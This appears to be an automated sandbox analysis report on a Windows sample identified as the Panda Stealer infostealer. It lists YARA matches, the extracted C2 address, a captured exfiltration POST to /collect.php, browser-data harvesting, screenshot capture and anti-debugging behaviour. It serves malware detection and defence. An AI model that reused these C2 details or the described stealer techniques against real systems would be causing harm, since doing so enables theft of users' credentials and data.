Edit tour

Windows Analysis Report
updater.exe

Overview

General Information

Sample Name:	updater.exe
Analysis ID:	1266489
MD5:	5b7111ae32c04c641c56e81a6293ec48
SHA1:	77331d9725c41635d6d449414c8a0d4ee00fac63
SHA256:	4cedab343fc4581149b13b7f6fd6532fa2c437550dee42926b37a93c6b5997f9
Infos:

Detection

Panda Stealer

Score:	92
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Antivirus / Scanner detection for submitted sample

Yara detected Panda Stealer

Machine Learning detection for sample

C2 URLs / IPs found in malware configuration

Tries to harvest and steal browser information (history, passwords, etc)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Contains functionality to dynamically determine API calls

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Searches the installation path of Mozilla Firefox

Extensive use of GetProcAddress (often used to hide API calls)

Contains functionality to read the PEB

PE / OLE file has an invalid certificate

Uses Microsoft's Enhanced Cryptographic Provider

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Classification

Process Tree

System is w7x64

updater.exe (PID: 2648 cmdline: C:\Users\user\Desktop\updater.exe MD5: 5B7111AE32C04C641C56E81A6293EC48)

cleanup

Malware Configuration

Threatname: Panda Stealer

{"C2 url": "http://f0837288.xsph.ru", "Version": "1.11"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
updater.exe	JoeSecurity_PandaStealer	Yara detected Panda Stealer	Joe Security
updater.exe	MALWARE_Win_Alfonoso	Detects Alfonoso / Shurk / HunterStealer infostealer	ditekSHen	0x96a6c:$s1: %s\etilqs_ 0x96bcc:$s2: SELECT name, rootpage, sql FROM '%q'.%s 0x97338:$s2: SELECT name, rootpage, sql FROM '%q'.%s 0x96b80:$s3: %s-mj%08X 0x92e7c:$s8: recursive_directory_iterator 0x92e9a:$s8: recursive_directory_iterator 0x92eb8:$s8: recursive_directory_iterator 0x96194:$s9: 2E 7A 69 70 00 00 00 00 2E 7A 6F 6F 00 00 00 00 2E 61 72 63 00 00 00 00 2E 6C 7A 68 00 00 00 00 2E 61 72 6A 00 00 00 00 2E 67 7A 00 2E 74 67 7A 00 00 00 00 0x96a84:$s11: :memory: 0x92f28:$s12: current_path() 0x96b6c:$s13: vtab:%p:%p
updater.exe	MALWARE_Win_PandaStealer	Detects Panda Stealer	ditekSHen	0x96228:$s2: user.config 0x96a6c:$s4: %s\etilqs_ 0xa18a0:$s7: .?AV?$_Ref_count_obj2@U_Recursive_dir_enum_impl@filesystem@std@@@ 0x96ea8:$s8: UPDATE %Q.%s SET sql = substr(sql,1,%d) \|\| ', ' \|\| %Q \|\| substr 0x96d8d:$s9: \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (
updater.exe	Windows_Trojan_Pandastealer_8b333e76	unknown	unknown	0x9636c:$a1: ] - [user: 0x96378:$a2: [-] data unpacked failed 0x96350:$a3: [+] data unpacked 0x96288:$a4: \history\ 0x963d0:$a5: PlayerName

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmp	Windows_Trojan_Pandastealer_8b333e76	unknown	unknown	0x1096c:$a1: ] - [user: 0x10978:$a2: [-] data unpacked failed 0x10950:$a3: [+] data unpacked 0x10888:$a4: \history\ 0x109d0:$a5: PlayerName
00000001.00000000.996893045.0000000001447000.00000002.00000001.01000000.00000003.sdmp	Windows_Trojan_Pandastealer_8b333e76	unknown	unknown	0x1096c:$a1: ] - [user: 0x10978:$a2: [-] data unpacked failed 0x10950:$a3: [+] data unpacked 0x10888:$a4: \history\ 0x109d0:$a5: PlayerName
Process Memory Space: updater.exe PID: 2648	JoeSecurity_PandaStealer	Yara detected Panda Stealer	Joe Security
Process Memory Space: updater.exe PID: 2648	Windows_Trojan_Pandastealer_8b333e76	unknown	unknown	0x5042:$a1: ] - [user: 0x50df:$a1: ] - [user: 0x72cf3:$a1: ] - [user: 0x72d90:$a1: ] - [user: 0x504e:$a2: [-] data unpacked failed 0x50ea:$a2: [-] data unpacked failed 0x72cff:$a2: [-] data unpacked failed 0x72d9b:$a2: [-] data unpacked failed 0x5030:$a3: [+] data unpacked 0x18c2a:$a3: [+] data unpacked 0x72ce1:$a3: [+] data unpacked 0x763e6:$a3: [+] data unpacked 0x4cb1:$a4: \history\ 0x72962:$a4: \history\ 0x507e:$a5: PlayerName 0x72d2f:$a5: PlayerName

Unpacked PEs

Source	Rule	Description	Author	Strings
1.0.updater.exe.13c0000.0.unpack	JoeSecurity_PandaStealer	Yara detected Panda Stealer	Joe Security
1.0.updater.exe.13c0000.0.unpack	MALWARE_Win_Alfonoso	Detects Alfonoso / Shurk / HunterStealer infostealer	ditekSHen	0x96a6c:$s1: %s\etilqs_ 0x96bcc:$s2: SELECT name, rootpage, sql FROM '%q'.%s 0x97338:$s2: SELECT name, rootpage, sql FROM '%q'.%s 0x96b80:$s3: %s-mj%08X 0x92e7c:$s8: recursive_directory_iterator 0x92e9a:$s8: recursive_directory_iterator 0x92eb8:$s8: recursive_directory_iterator 0x96194:$s9: 2E 7A 69 70 00 00 00 00 2E 7A 6F 6F 00 00 00 00 2E 61 72 63 00 00 00 00 2E 6C 7A 68 00 00 00 00 2E 61 72 6A 00 00 00 00 2E 67 7A 00 2E 74 67 7A 00 00 00 00 0x96a84:$s11: :memory: 0x92f28:$s12: current_path() 0x96b6c:$s13: vtab:%p:%p
1.0.updater.exe.13c0000.0.unpack	MALWARE_Win_PandaStealer	Detects Panda Stealer	ditekSHen	0x96228:$s2: user.config 0x96a6c:$s4: %s\etilqs_ 0xa18a0:$s7: .?AV?$_Ref_count_obj2@U_Recursive_dir_enum_impl@filesystem@std@@@ 0x96ea8:$s8: UPDATE %Q.%s SET sql = substr(sql,1,%d) \|\| ', ' \|\| %Q \|\| substr 0x96d8d:$s9: \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (
1.0.updater.exe.13c0000.0.unpack	Windows_Trojan_Pandastealer_8b333e76	unknown	unknown	0x9636c:$a1: ] - [user: 0x96378:$a2: [-] data unpacked failed 0x96350:$a3: [+] data unpacked 0x96288:$a4: \history\ 0x963d0:$a5: PlayerName
1.2.updater.exe.13c0000.0.unpack	JoeSecurity_PandaStealer	Yara detected Panda Stealer	Joe Security
1.2.updater.exe.13c0000.0.unpack	MALWARE_Win_Alfonoso	Detects Alfonoso / Shurk / HunterStealer infostealer	ditekSHen	0x96a6c:$s1: %s\etilqs_ 0x96bcc:$s2: SELECT name, rootpage, sql FROM '%q'.%s 0x97338:$s2: SELECT name, rootpage, sql FROM '%q'.%s 0x96b80:$s3: %s-mj%08X 0x92e7c:$s8: recursive_directory_iterator 0x92e9a:$s8: recursive_directory_iterator 0x92eb8:$s8: recursive_directory_iterator 0x96194:$s9: 2E 7A 69 70 00 00 00 00 2E 7A 6F 6F 00 00 00 00 2E 61 72 63 00 00 00 00 2E 6C 7A 68 00 00 00 00 2E 61 72 6A 00 00 00 00 2E 67 7A 00 2E 74 67 7A 00 00 00 00 0x96a84:$s11: :memory: 0x92f28:$s12: current_path() 0x96b6c:$s13: vtab:%p:%p
1.2.updater.exe.13c0000.0.unpack	MALWARE_Win_PandaStealer	Detects Panda Stealer	ditekSHen	0x96228:$s2: user.config 0x96a6c:$s4: %s\etilqs_ 0xa18a0:$s7: .?AV?$_Ref_count_obj2@U_Recursive_dir_enum_impl@filesystem@std@@@ 0x96ea8:$s8: UPDATE %Q.%s SET sql = substr(sql,1,%d) \|\| ', ' \|\| %Q \|\| substr 0x96d8d:$s9: \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (
1.2.updater.exe.13c0000.0.unpack	Windows_Trojan_Pandastealer_8b333e76	unknown	unknown	0x9636c:$a1: ] - [user: 0x96378:$a2: [-] data unpacked failed 0x96350:$a3: [+] data unpacked 0x96288:$a4: \history\ 0x963d0:$a5: PlayerName
Click to see the 3 entries

HTTP traffic detected: POST /collect.php HTTP/1.1Content-Type: multipart/form-data; boundary=SendFileZIPBoundaryUser-Agent: uploaderHost: f0837288.xsph.ruContent-Length: 1661723Connection: Keep-AliveCache-Control: no-cache

Source: unknown

DNS traffic detected: queries for: f0837288.xsph.ru

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected Panda Stealer

Source: Yara match	File source: updater.exe, type: SAMPLE
Source: Yara match	File source: 1.0.updater.exe.13c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.updater.exe.13c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: Process Memory Space: updater.exe PID: 2648, type: MEMORYSTR

Source: C:\Users\user\Desktop\updater.exe

Code function: 1_2_013DB7C3 GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,EnterCriticalSection,LeaveCriticalSection,DeleteDC,DeleteObject,ReleaseDC,

1_2_013DB7C3

System Summary

Malicious sample detected (through community Yara rule)

Source: updater.exe, type: SAMPLE	Matched rule: Detects Alfonoso / Shurk / HunterStealer infostealer Author: ditekSHen
Source: updater.exe, type: SAMPLE	Matched rule: Detects Panda Stealer Author: ditekSHen
Source: updater.exe, type: SAMPLE	Matched rule: Windows_Trojan_Pandastealer_8b333e76 Author: unknown
Source: 1.0.updater.exe.13c0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Alfonoso / Shurk / HunterStealer infostealer Author: ditekSHen
Source: 1.0.updater.exe.13c0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Panda Stealer Author: ditekSHen
Source: 1.0.updater.exe.13c0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Pandastealer_8b333e76 Author: unknown
Source: 1.2.updater.exe.13c0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Alfonoso / Shurk / HunterStealer infostealer Author: ditekSHen
Source: 1.2.updater.exe.13c0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Panda Stealer Author: ditekSHen
Source: 1.2.updater.exe.13c0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Pandastealer_8b333e76 Author: unknown
Source: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Pandastealer_8b333e76 Author: unknown
Source: 00000001.00000000.996893045.0000000001447000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Pandastealer_8b333e76 Author: unknown
Source: Process Memory Space: updater.exe PID: 2648, type: MEMORYSTR	Matched rule: Windows_Trojan_Pandastealer_8b333e76 Author: unknown

Source: updater.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: updater.exe, type: SAMPLE	Matched rule: MALWARE_Win_Alfonoso snort2_sid = 920102, author = ditekSHen, description = Detects Alfonoso / Shurk / HunterStealer infostealer, clamav_sig = MALWARE.Win.Trojan.Alfonso, snort3_sid = 920100
Source: updater.exe, type: SAMPLE	Matched rule: MALWARE_Win_PandaStealer author = ditekSHen, description = Detects Panda Stealer
Source: updater.exe, type: SAMPLE	Matched rule: Windows_Trojan_Pandastealer_8b333e76 reference_sample = ec346bd56be375b695b4bc76720959fa07d1357ffc3783eb61de9b8d91b3d935, os = windows, severity = x86, creation_date = 2021-09-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pandastealer, fingerprint = 873af8643b7f08b159867c3556654a5719801aa82e1a1f6402029afad8c01487, id = 8b333e76-f723-4093-ad72-2f5d42aaa9c9, last_modified = 2022-01-13
Source: 1.0.updater.exe.13c0000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Alfonoso snort2_sid = 920102, author = ditekSHen, description = Detects Alfonoso / Shurk / HunterStealer infostealer, clamav_sig = MALWARE.Win.Trojan.Alfonso, snort3_sid = 920100
Source: 1.0.updater.exe.13c0000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_PandaStealer author = ditekSHen, description = Detects Panda Stealer
Source: 1.0.updater.exe.13c0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Pandastealer_8b333e76 reference_sample = ec346bd56be375b695b4bc76720959fa07d1357ffc3783eb61de9b8d91b3d935, os = windows, severity = x86, creation_date = 2021-09-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pandastealer, fingerprint = 873af8643b7f08b159867c3556654a5719801aa82e1a1f6402029afad8c01487, id = 8b333e76-f723-4093-ad72-2f5d42aaa9c9, last_modified = 2022-01-13
Source: 1.2.updater.exe.13c0000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Alfonoso snort2_sid = 920102, author = ditekSHen, description = Detects Alfonoso / Shurk / HunterStealer infostealer, clamav_sig = MALWARE.Win.Trojan.Alfonso, snort3_sid = 920100
Source: 1.2.updater.exe.13c0000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_PandaStealer author = ditekSHen, description = Detects Panda Stealer
Source: 1.2.updater.exe.13c0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Pandastealer_8b333e76 reference_sample = ec346bd56be375b695b4bc76720959fa07d1357ffc3783eb61de9b8d91b3d935, os = windows, severity = x86, creation_date = 2021-09-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pandastealer, fingerprint = 873af8643b7f08b159867c3556654a5719801aa82e1a1f6402029afad8c01487, id = 8b333e76-f723-4093-ad72-2f5d42aaa9c9, last_modified = 2022-01-13
Source: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Pandastealer_8b333e76 reference_sample = ec346bd56be375b695b4bc76720959fa07d1357ffc3783eb61de9b8d91b3d935, os = windows, severity = x86, creation_date = 2021-09-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pandastealer, fingerprint = 873af8643b7f08b159867c3556654a5719801aa82e1a1f6402029afad8c01487, id = 8b333e76-f723-4093-ad72-2f5d42aaa9c9, last_modified = 2022-01-13
Source: 00000001.00000000.996893045.0000000001447000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Pandastealer_8b333e76 reference_sample = ec346bd56be375b695b4bc76720959fa07d1357ffc3783eb61de9b8d91b3d935, os = windows, severity = x86, creation_date = 2021-09-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pandastealer, fingerprint = 873af8643b7f08b159867c3556654a5719801aa82e1a1f6402029afad8c01487, id = 8b333e76-f723-4093-ad72-2f5d42aaa9c9, last_modified = 2022-01-13
Source: Process Memory Space: updater.exe PID: 2648, type: MEMORYSTR	Matched rule: Windows_Trojan_Pandastealer_8b333e76 reference_sample = ec346bd56be375b695b4bc76720959fa07d1357ffc3783eb61de9b8d91b3d935, os = windows, severity = x86, creation_date = 2021-09-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pandastealer, fingerprint = 873af8643b7f08b159867c3556654a5719801aa82e1a1f6402029afad8c01487, id = 8b333e76-f723-4093-ad72-2f5d42aaa9c9, last_modified = 2022-01-13

Source: C:\Users\user\Desktop\updater.exe	Code function: 1_2_013D04AD	1_2_013D04AD
Source: C:\Users\user\Desktop\updater.exe	Code function: 1_2_013CC9EC	1_2_013CC9EC
Source: C:\Users\user\Desktop\updater.exe	Code function: 1_2_013DAF64	1_2_013DAF64
Source: C:\Users\user\Desktop\updater.exe	Code function: 1_2_013D9151	1_2_013D9151
Source: C:\Users\user\Desktop\updater.exe	Code function: 1_2_013D7009	1_2_013D7009
Source: C:\Users\user\Desktop\updater.exe	Code function: 1_2_013D3095	1_2_013D3095
Source: C:\Users\user\Desktop\updater.exe	Code function: 1_2_013C9294	1_2_013C9294
Source: C:\Users\user\Desktop\updater.exe	Code function: 1_2_013C3507	1_2_013C3507
Source: C:\Users\user\Desktop\updater.exe	Code function: 1_2_013CB653	1_2_013CB653
Source: C:\Users\user\Desktop\updater.exe	Code function: 1_2_013D1BD6	1_2_013D1BD6
Source: C:\Users\user\Desktop\updater.exe	Code function: 1_2_013C7D35	1_2_013C7D35
Source: C:\Users\user\Desktop\updater.exe	Code function: 1_2_013D3E7B	1_2_013D3E7B
Source: C:\Users\user\Desktop\updater.exe	Code function: 1_2_01436129	1_2_01436129
Source: C:\Users\user\Desktop\updater.exe	Code function: 1_2_0142A340	1_2_0142A340
Source: C:\Users\user\Desktop\updater.exe	Code function: 1_2_0142836D	1_2_0142836D
Source: C:\Users\user\Desktop\updater.exe	Code function: 1_2_0143A3E3	1_2_0143A3E3
Source: C:\Users\user\Desktop\updater.exe	Code function: 1_2_013C8547	1_2_013C8547
Source: C:\Users\user\Desktop\updater.exe	Code function: 1_2_013D2431	1_2_013D2431
Source: C:\Users\user\Desktop\updater.exe	Code function: 1_2_0142C6F6	1_2_0142C6F6
Source: C:\Users\user\Desktop\updater.exe	Code function: 1_2_0143E93F	1_2_0143E93F
Source: C:\Users\user\Desktop\updater.exe	Code function: 1_2_0142493E	1_2_0142493E
Source: C:\Users\user\Desktop\updater.exe	Code function: 1_2_013E0B70	1_2_013E0B70
Source: C:\Users\user\Desktop\updater.exe	Code function: 1_2_0143EA5F	1_2_0143EA5F
Source: C:\Users\user\Desktop\updater.exe	Code function: 1_2_01420F70	1_2_01420F70
Source: C:\Users\user\Desktop\updater.exe	Code function: 1_2_01400EF6	1_2_01400EF6
Source: C:\Users\user\Desktop\updater.exe	Code function: 1_2_0143CE9E	1_2_0143CE9E
Source: C:\Users\user\Desktop\updater.exe	Code function: 1_2_013E9082	1_2_013E9082
Source: C:\Users\user\Desktop\updater.exe	Code function: 1_2_014353C4	1_2_014353C4
Source: C:\Users\user\Desktop\updater.exe	Code function: 1_2_01441200	1_2_01441200
Source: C:\Users\user\Desktop\updater.exe	Code function: 1_2_013C72BC	1_2_013C72BC
Source: C:\Users\user\Desktop\updater.exe	Code function: 1_2_01401702	1_2_01401702
Source: C:\Users\user\Desktop\updater.exe	Code function: 1_2_013F364A	1_2_013F364A

Source: C:\Users\user\Desktop\updater.exe	Code function: String function: 0141E620 appears 36 times
Source: C:\Users\user\Desktop\updater.exe	Code function: String function: 0141E2BF appears 75 times
Source: C:\Users\user\Desktop\updater.exe	Code function: String function: 01440CFC appears 73 times
Source: C:\Users\user\Desktop\updater.exe	Code function: String function: 0141E2F3 appears 51 times

Source: C:\Users\user\Desktop\updater.exe

Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\52.0.1 (x86 en-US)\Main Install Directory

Jump to behavior

Source: updater.exe

Static PE information: invalid certificate

Source: C:\Users\user\Desktop\updater.exe	Memory allocated: 77620000 page execute and read and write			Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	Memory allocated: 77740000 page execute and read and write			Jump to behavior

Source: updater.exe	ReversingLabs: Detection: 91%
Source: updater.exe	Virustotal: Detection: 84%

Source: updater.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\updater.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\updater.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\updater.exe

File created: C:\Users\user\AppData\Local\Temp\BOFUPMJWUSFVSNIBDJEE

Jump to behavior

Source: classification engine

Classification label: mal92.troj.spyw.winEXE@1/5@1/1

Source: updater.exe, updater.exe, 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmp, updater.exe, 00000001.00000000.996893045.0000000001447000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: updater.exe, 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmp, updater.exe, 00000001.00000000.996893045.0000000001447000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: updater.exe, updater.exe, 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmp, updater.exe, 00000001.00000000.996893045.0000000001447000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;

Source: C:\Users\user\Desktop\updater.exe

Code function: 1_2_013D6592 CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,OpenProcess,QueryFullProcessImageNameA,Process32Next,Process32Next,

1_2_013D6592

Source: C:\Users\user\Desktop\updater.exe

Code function: 1_2_013C433F LoadResource,LockResource,SizeofResource,

1_2_013C433F

Source: C:\Users\user\Desktop\updater.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: C:\Users\user\Desktop\updater.exe

File opened: C:\Windows\SysWOW64\RichEd32.dll

Jump to behavior

Source: updater.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: updater.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source: C:\Users\user\Desktop\updater.exe	Code function: 1_2_0141E299 push ecx; ret	1_2_0141E2AC
Source: C:\Users\user\Desktop\updater.exe	Code function: 1_2_0141E664 push ecx; ret	1_2_0141E676
Source: C:\Users\user\Desktop\updater.exe	Code function: 1_2_01440D1A push eax; ret	1_2_01440D50
Source: C:\Users\user\Desktop\updater.exe	Code function: 1_2_01440D9A push ecx; ret	1_2_01440DA9
Source: C:\Users\user\Desktop\updater.exe	Code function: 1_2_01440CFC push eax; ret	1_2_01440D18

Source: C:\Users\user\Desktop\updater.exe

Code function: 1_2_013DA518 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,

1_2_013DA518

Source: C:\Users\user\Desktop\updater.exe

Code function: 1_2_013C3507 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,

1_2_013C3507

Source: C:\Users\user\Desktop\updater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\updater.exe TID: 808

Thread sleep time: -180000s >= -30000s

Jump to behavior

Source: C:\Users\user\Desktop\updater.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\updater.exe

Code function: 1_2_014224FE VirtualQuery,GetSystemInfo,VirtualAlloc,VirtualProtect,

1_2_014224FE

Source: C:\Users\user\Desktop\updater.exe	Code function: 1_2_01406107 FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,	1_2_01406107
Source: C:\Users\user\Desktop\updater.exe	Code function: 1_2_014061B5 GetLongPathNameW,GetLastError,___std_fs_open_handle@16,GetLastError,GetFileInformationByHandle,FindFirstFileExW,FindClose,	1_2_014061B5
Source: C:\Users\user\Desktop\updater.exe	Code function: 1_2_01406127 FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,	1_2_01406127

Source: C:\Users\user\Desktop\updater.exe	File opened: C:\Users\user\AppData\Roaming\Adobe\Acrobat\	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	File opened: C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	File opened: C:\Users\user\AppData\Roaming\	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	File opened: C:\Users\user\AppData\Roaming\Adobe\	Jump to behavior
Source: C:\Users\user\Desktop\updater.exe	File opened: C:\Users\user\	Jump to behavior

Source: C:\Users\user\Desktop\updater.exe

Code function: 1_2_0141E44C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

1_2_0141E44C

Source: C:\Users\user\Desktop\updater.exe

Code function: 1_2_014224FE VirtualProtect ?,-00000001,00000104,?,?,?,0000001C

1_2_014224FE

Source: C:\Users\user\Desktop\updater.exe

Code function: 1_2_013DA518 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,

1_2_013DA518

Source: C:\Users\user\Desktop\updater.exe

Code function: 1_2_013C4455 GetProcessHeap,

1_2_013C4455

Source: C:\Users\user\Desktop\updater.exe	Code function: 1_2_01430095 mov eax, dword ptr fs:[00000030h]		1_2_01430095
Source: C:\Users\user\Desktop\updater.exe	Code function: 1_2_01422780 mov eax, dword ptr fs:[00000030h]		1_2_01422780

Source: C:\Users\user\Desktop\updater.exe	Code function: 1_2_0141E5AE SetUnhandledExceptionFilter,	1_2_0141E5AE
Source: C:\Users\user\Desktop\updater.exe	Code function: 1_2_0141E44C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_0141E44C
Source: C:\Users\user\Desktop\updater.exe	Code function: 1_2_0141E9B2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_0141E9B2
Source: C:\Users\user\Desktop\updater.exe	Code function: 1_2_0142337D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_0142337D

